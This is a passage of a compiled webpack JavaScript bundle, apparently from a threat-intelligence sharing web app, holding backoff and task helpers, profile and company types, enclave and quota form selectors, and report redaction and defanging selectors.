  function Backoff(cb, baseMillis, maxMillis) {
    this.baseMillis = baseMillis || Backoff.DEFAULT_BASE_MILLIS;
    this.maxMillis = maxMillis || Backoff.DEFAULT_MAX_MILLIS;
    this.attempts = 0;
    this.cb = cb;
  }
  /**
   * Schedule a next call to `cb`
   * @returns scheduled delay in milliseconds
   */


  var _proto = Backoff.prototype;

  _proto.scheduleCall = function scheduleCall() {
    var _this = this;

    var delayInMillis = Math.min(this.baseMillis * Math.pow(2, this.attempts), this.maxMillis);
    if (this.timeoutID) clearTimeout(this.timeoutID);
    this.timeoutID = setTimeout(function () {
      _this.cb();
    }, delayInMillis);
    this.attempts++;
    return delayInMillis;
  };

  _proto.reset = function reset() {
    this.attempts = 0;

    if (this.timeoutID) {
      clearTimeout(this.timeoutID);
      this.timeoutID = 0;
    }
  };

  return Backoff;
}();

Backoff.DEFAULT_BASE_MILLIS = 1000; // 1 second

Backoff.DEFAULT_MAX_MILLIS = 1800000; // 30 minutes

/* harmony default export */ __webpack_exports__["a"] = (Backoff);

/***/ }),
/* 703 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_fn_repeat__ = __webpack_require__(700);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-producer:task');


/**
 * Startable task factory.
 */

var TaskFactory = function TaskFactory(updater, period) {
  var updaterName = Object(__WEBPACK_IMPORTED_MODULE_2__utils_lang__["f" /* getFnName */])(updater);
  var stopUpdater = false;
  return {
    start: function start() {
      if (!stopUpdater) {
        log.debug("Starting " + updaterName + " refreshing each " + period);
        stopUpdater = Object(__WEBPACK_IMPORTED_MODULE_1__utils_fn_repeat__["a" /* default */])(function (reschedule) {
          log.debug("Running " + updaterName);
          updater().then(function () {
            return reschedule();
          });
        }, period);
      }
    },
    stop: function stop() {
      log.debug("Stopping " + updaterName);
      stopUpdater && stopUpdater();
      stopUpdater = false;
    },
    isRunning: function isRunning() {
      return stopUpdater ? true : false;
    }
  };
};

/* harmony default export */ __webpack_exports__["a"] = (TaskFactory);

/***/ }),
/* 704 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return PROFILE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return PROFILE_QUOTAS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return PREFERENCES_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return Profile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return toProfile; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__enclave_types_js__ = __webpack_require__(99);






var PROFILE_ENDPOINT = '/services/users/profile';
var PROFILE_QUOTAS_ENDPOINT = '/services/users/profile/quota';
var PREFERENCES_ENDPOINT = '/services/users/preferences';

var Profile = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  firstName: '',
  lastName: '',
  email: '',
  guid: '',
  company: null,
  lastLogin: null,
  activationDate: null,
  created: null,
  mfaEnabled: false,
  ssoEnabled: false,
  role: null,
  enclaves: [],
  sector: '',
  preferences: {}
});

var toProfile = function toProfile(k, v) {
  if (k === '') {
    return Profile(v);
  } else if (k === 'enclaves') {
    return v ? v.map(__WEBPACK_IMPORTED_MODULE_2__enclave_types_js__["i" /* createEnclave */]) : v;
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isMapLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(v);
  } else if (Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["isListLike"])(v)) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(v);
  } else {
    return v;
  }
};

/***/ }),
/* 705 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(2894)


/***/ }),
/* 706 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return JOIN_COMMUNITY_CHAT_CHANNEL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CHAT_INVITE_STATUS_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CLOSE_CHAT_MODAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return LAUNCH_COMMUNITY_CHAT; });
var prefix = function prefix(str) {
  return 'station/chat/' + str;
};

// Slack Community Chat Actions
var JOIN_COMMUNITY_CHAT_CHANNEL = prefix('JOIN_COMMUNITY_CHAT_CHANNEL');
var CHAT_INVITE_STATUS_UPDATE = prefix('CHAT_INVITE_STATUS_UPDATE');
var CLOSE_CHAT_MODAL = prefix('CLOSE_CHAT_MODAL');
var LAUNCH_COMMUNITY_CHAT = prefix('LAUNCH_COMMUNITY_CHAT');

/***/ }),
/* 707 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_QUOTA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_QUOTA_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_QUOTA_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return SAVE_QUOTA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return SAVE_QUOTA_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return SAVE_QUOTA_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return RESET_QUOTA; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return RESET_QUOTA_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return RESET_QUOTA_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return SET_DISPLAY_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/companies/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

// Action types for fetching rate limits / request quotas
var FETCH_QUOTA = prefix('FETCH_QUOTA');
var FETCH_QUOTA_SUCCESS = prefix('FETCH_QUOTA_SUCCESS');
var FETCH_QUOTA_FAILURE = prefix('FETCH_QUOTA_FAILURE');

var SAVE_QUOTA = prefix('SAVE_QUOTA');
var SAVE_QUOTA_SUCCESS = prefix('SAVE_QUOTA_SUCCESS');
var SAVE_QUOTA_FAILURE = prefix('SAVE_QUOTA_FAILURE');

var RESET_QUOTA = prefix('RESET_QUOTA');
var RESET_QUOTA_SUCCESS = prefix('RESET_QUOTA_SUCCESS');
var RESET_QUOTA_FAILURE = prefix('RESET_QUOTA_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

/***/ }),
/* 708 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companies", function() { return companies; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "quotas", function() { return quotas; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fullyLoaded", function() { return fullyLoaded; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companiesByGuid", function() { return companiesByGuid; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "company", function() { return company; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyByGuid", function() { return companyByGuid; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "quota", function() { return quota; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filteredCompanies", function() { return filteredCompanies; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sectorOptions", function() { return sectorOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "managedEnclaves", function() { return managedEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "managedEnclavesWithQuery", function() { return managedEnclavesWithQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveOptions", function() { return enclaveOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "queriedEnclaveOptions", function() { return queriedEnclaveOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValuesForAdd", function() { return getInitialFormValuesForAdd; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_enclave_management_getters_js__ = __webpack_require__(886);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_groups_utils_js__ = __webpack_require__(1301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_sectors_getters_js__ = __webpack_require__(1302);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types__ = __webpack_require__(252);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__index_js__ = __webpack_require__(402);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_enclave_utils__ = __webpack_require__(297);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_miscellaneous_getters_js__ = __webpack_require__(345);
















var companies = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companies', 'companies']);

var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companies', 'loading']);

var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companies', 'options']);

var quotas = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companies', 'quotas']);

var fullyLoaded = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companies', 'fullyLoaded']);

/**
 * NOTE: In this case the "quota" is actually the list of quotas for the company
 * with this id
 */

var companiesByGuid = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(companies, function (companies) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(companies.toList().map(function (x) {
    return [x.guid, x];
  }));
});

var company = function company(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(companies, function (companies) {
    return companies.get(id);
  });
};

var companyByGuid = function companyByGuid(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(companiesByGuid, function (companies) {
    return companies.get(guid);
  });
};

var quota = function quota(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(companyByGuid(guid), __WEBPACK_IMPORTED_MODULE_9__index_js__["getQuotaFromCompany"]);
};

/**
 * Returns companies filtered by options.filterText
 */
var filteredCompanies = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([companies, displayOptions], function (companies, options) {
  var enclaveId = options.get('enclaveId');
  return companies.toSeq().valueSeq().filter(function (company) {
    if (!enclaveId) return true;

    if (enclaveId && !company.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])()).keySeq().contains(enclaveId)) {
      return false;
    }

    // Test all top-level string values
    return company.toSeq().valueSeq().filter(__WEBPACK_IMPORTED_MODULE_4_lodash_isstring___default.a);
  });
});

// Sector options for save company form
var sectorOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_7_modules_sectors_getters_js__["sectors"], function (sectors) {
  return sectors.toList().map(function (_ref) {
    var id = _ref.id,
        label = _ref.label;

    return {
      value: id,
      label: label
    };
  }).toJS();
});

// whether a given enclave can be assigned to a given company
var canAssignToCompany = function canAssignToCompany(companyGuid, enclave) {
  switch (enclave.accessManagementType) {
    case 'ALLOWED':
      return true;
    case 'FORBIDDEN':
      return false;
    case 'COMPANY':
      var companyId = enclave.companyId;
      return companyId != null && companyId === companyGuid;
  }
};

// All enclaves for which company permissions can be manually managed
var managedEnclaves = function managedEnclaves(companyGuid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_5_modules_enclave_management_getters_js__["enclavesMap"]], function (enclaves) {
    return enclaves.filter(function (x) {
      return canAssignToCompany(companyGuid, x);
    });
  });
};

/*
 It's a bit redundant to have two managed enclaves, but we are seperating the queried enclaves
  from the more global ones because of how many different components really on the enclaves above, we
  don't want to accidentally filter out an enclave and have that filter persist elsewhere
*/
var managedEnclavesWithQuery = function managedEnclavesWithQuery(companyGuid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_5_modules_enclave_management_getters_js__["queriedEnclavesMap"]], function (enclaves) {
    return enclaves.filter(function (x) {
      return canAssignToCompany(companyGuid, x);
    });
  });
};

// construct the object to be used in the enclave selector for the companies form
var createEnclaveOption = function createEnclaveOption(enclave) {
  var value = enclave.get('id');
  var option = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    value: value,
    id: value
  }).merge(enclave);
  return option.set('label', enclave.get('name'));
};

// the list of all enclaves that can be assigned to the company with the specified GUID
// the enclaves will be transformed to the format required for the selector
var enclaveOptionsMap = function enclaveOptionsMap(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([managedEnclaves(guid), __WEBPACK_IMPORTED_MODULE_11_modules_miscellaneous_getters_js__["accessTypes"]], function (enclaves, accessTypes) {
    return enclaves.map(function (enclave) {
      return createEnclaveOption(enclave);
    }).map(function (e) {
      return e.update('maximumAccess', function (t) {
        return accessTypes.get(t);
      });
    });
  });
};

// Enclave options for save company form
var enclaveOptions = function enclaveOptions(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaveOptionsMap(guid), function (enclaveOptionsMap) {
    return enclaveOptionsMap.toList().sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).toJS();
  });
};
// Enclave options for save company form
var queriedEnclaveOptions = function queriedEnclaveOptions(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([managedEnclavesWithQuery(guid), __WEBPACK_IMPORTED_MODULE_11_modules_miscellaneous_getters_js__["accessTypes"]], function (enclaveOptionsMap
  // Add company access type to enclave and format the data to work with our selector
  , accessTypes) {
    return enclaveOptionsMap.map(function (enclave) {
      return createEnclaveOption(enclave);
    }).map(function (e) {
      return e.update('maximumAccess', function (t) {
        return accessTypes.get(t);
      });
    }).toList().sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]).toJS();
  });
};

// merges information from the enclave permission object for the company
// with information from the enclave management store about the enclave
var mergeEnclavePermission = function mergeEnclavePermission(enclavePermission, enclaveOptionsMap) {
  var enclave = enclaveOptionsMap.get(enclavePermission.get('id'));
  if (!enclave) return null;
  return createEnclaveOption(enclave).set('maximumAccess', Object(__WEBPACK_IMPORTED_MODULE_10_modules_enclave_utils__["c" /* determineAccessType */])(enclavePermission));
};

/* Generate the initial values for the save company form
 * NOTE: FlowFixMes - both sector and company should exist.
 **/
var getInitialFormValues = function getInitialFormValues(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaveOptionsMap(guid), __WEBPACK_IMPORTED_MODULE_7_modules_sectors_getters_js__["sectors"], filteredCompanies, quota(guid), function (enclaveOptionsMap, sectors, companies, quota) {
    if (!guid) return Object(__WEBPACK_IMPORTED_MODULE_8__types__["a" /* Company */])({ maxUserCount: 25 });
    // $FlowFixMe
    return companies.find(function (c) {
      return c.get('guid') === guid;
    }).update('enclaves', function (enclaves) {
      return enclaves.map(function (enclavePermission) {
        return mergeEnclavePermission(enclavePermission, enclaveOptionsMap);
      }).filter(function (x) {
        return x != null;
      }).toList().sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
    }).update('sharingGroups', Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["map"])(__WEBPACK_IMPORTED_MODULE_6_modules_groups_utils_js__["a" /* sharingGroupToFormOptions */])).update('rateLimit', function (x) {
      return quota ? quota.get('maxRequests') : undefined;
    }).update('requestQuotas', function (quotas) {
      return quotas || Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
    }).update('sector', function (sector) {
      return sector.set('value', sector.get('id'));
    });
  });
};

/**
 * Generate initial form values for creating new company. This should
 * add all the open source enclaves that exist at the time of creation.
 *
 * NOTE: The default rate limit for all companies. This simply updates the
 * default value in the form, so the admin can manually set this to whatever is
 * appropriate for that company.
 */
var getInitialFormValuesForAdd = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([managedEnclaves(null), __WEBPACK_IMPORTED_MODULE_11_modules_miscellaneous_getters_js__["accessTypes"]], function (enclaves, accessTypes) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    enclaves: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(),
    sharingGroups: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(),
    requestQuotas: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])([Object(__WEBPACK_IMPORTED_MODULE_8__types__["d" /* Quota */])()]),
    rateLimit: 1500, // See NOTE
    maxIngestEmailsCount: 1, // See NOTE
    maxUserCount: 25 // See NOTE
  });
});

/***/ }),
/* 709 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentStage", function() { return currentStage; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submissionType", function() { return submissionType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "applyRedaction", function() { return applyRedaction; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "attachFileLoading", function() { return attachFileLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formValues", function() { return formValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "emailableContent", function() { return emailableContent; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactedValues", function() { return redactedValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_redaction_getters_js__ = __webpack_require__(710);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_reports_defang__ = __webpack_require__(1304);








var currentStage = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'currentStage']);

var submissionType = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'submissionType']);

var applyRedaction = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'applyRedaction']);

var attachFileLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'attachFileLoading']);

var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'loading']);

var formValues = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['create', 'form', 'currentValues']);

var emailableContent = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([formValues, __WEBPACK_IMPORTED_MODULE_3_modules_redaction_getters_js__["redactionMap"]], function (report, redactionMap) {
  if (!report) return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({ reportTitle: '', reportContent: '' });
  var values = Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils_utils_js__["redactAll"])({ report: report, redactionMap: redactionMap, toHash: false });
  if (!values) return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({ reportTitle: '', reportContent: '' });
  var title = values.get('title');
  var content = values.getIn(['content', 'data']);

  var reportTitle = title && encodeURIComponent(Object(__WEBPACK_IMPORTED_MODULE_5_trustar_reports_defang__["a" /* defang */])('Incident Report: ' + title));

  var divider = '-----------------------------';
  var truStarAd = divider + '\n\nTo learn more and join TruSTAR go to www.trustar.co\n\n' + divider + '\n\n';

  // to preserve all the formatting in the email body, we should use encodeURIComponent

  // encodeURIComponent vs encodeURI: encodeURIComponent will treat value as a value of a parameter in url and encode everything including
  // all the special characters, encodeURI will encode value as a url and not encode some special characters
  // such as ? & = because they are reserved keywords with some sort of functionalities.
  // So must use encodeURIComponent in case report content comes with characters not escaped by encodeURI

  var reportContent = content ? encodeURIComponent('TruSTAR Incident Report Title: ' + Object(__WEBPACK_IMPORTED_MODULE_5_trustar_reports_defang__["a" /* defang */])(title) + '\n\n' + Object(__WEBPACK_IMPORTED_MODULE_5_trustar_reports_defang__["a" /* defang */])(content) + '\n\n\n' + truStarAd) : '';

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
    reportTitle: reportTitle,
    reportContent: reportContent
  });
});

var redactedValues = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([__WEBPACK_IMPORTED_MODULE_3_modules_redaction_getters_js__["redactionMap"], formValues], function (redactionMap, formValues) {
  return Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils_utils_js__["redactAll"])({
    report: formValues,
    redactionMap: redactionMap,
    toHash: true
  });
});

/***/ }),
/* 710 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "status", function() { return status; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentCategoryId", function() { return currentCategoryId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionTerms", function() { return redactionTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionTermsTextMap", function() { return redactionTermsTextMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactables", function() { return redactables; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allRedactables", function() { return allRedactables; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionTermList", function() { return redactionTermList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentTerms", function() { return currentTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionTerm", function() { return redactionTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionTermExists", function() { return redactionTermExists; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "truncatedCategoryList", function() { return truncatedCategoryList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "categoryList", function() { return categoryList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactionMap", function() { return redactionMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactablesMap", function() { return redactablesMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants_js__ = __webpack_require__(412);







var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'loading']);
var status = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'status']);
var currentCategoryId = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'currentCategoryId']);
var redactionTerms = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'terms']);
var redactionTermsTextMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'termsTextMap']);
var redactables = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'redactables']);
var allRedactables = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['redaction', 'allRedactables']);

var redactionTermList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTerms, function (redactionTerms) {
  return redactionTerms.toList();
});

/**
 * For some reason using valueSeq here breaks the fixed data table.
 *
 * NOTE: Because we are using this in FixedDataTable we need to provide an
 * indexed data structure. Currently we're using List.
 */
var currentTerms = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([redactionTerms, currentCategoryId], function (redactionTerms, currentCategoryId) {
  return redactionTerms.filter(function (redactionTerm) {
    return redactionTerm.get('categoryId') === currentCategoryId;
  }).toList();
});

/**
 * Currently we only use this for testing purposes. It can be useful to get a
 * term by ID. This is essentially just a convenience method since we could
 * always just evaluate the full term state and get one by ID.
 */
var redactionTerm = function redactionTerm(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(redactionTerms, function (redactionTerms) {
    return redactionTerms.get(id);
  });
};

/**
 * Get a term by its text. This is used during validation to avoid term
 * duplication. So far this is the entire point of the termTextMap store:
 * constant time checking whether a term exists.
 */
var redactionTermExists = function redactionTermExists(text) {
